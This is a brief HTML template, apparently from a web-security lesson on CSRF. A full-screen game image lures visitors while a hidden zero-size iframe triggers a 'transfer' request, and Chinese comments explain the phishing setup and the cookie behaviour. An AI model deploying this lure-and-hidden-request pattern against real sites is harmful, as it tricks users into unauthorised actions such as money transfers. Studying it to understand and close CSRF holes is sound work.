<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>是男人就下100层</title>
</head>
<body>
{#电影/小游戏吸引人上钩,宽度高度填充整个浏览器#}
{#诱惑网站/钓鱼网站；防止被盗风险，安全隐患，将csrf漏洞堵上#}
<img src="http://cms-bucket.nosdn.127.net/312e057a25f148519dc02b40812c78fe20170510155251.gif" alt="" width="100%" height="100%">


{#iframe 在一个网页中加载另外一个网页/嵌入，形成子页面#}
{#通过宽高为0来隐藏iframe#}
{#js是无法操作其他域名下面的cookie的，浏览器级别的限制#}
<iframe width="0"  height="0" src="{{ url_for("transfer") }}" frameborder="0"></iframe>

</body>
</html>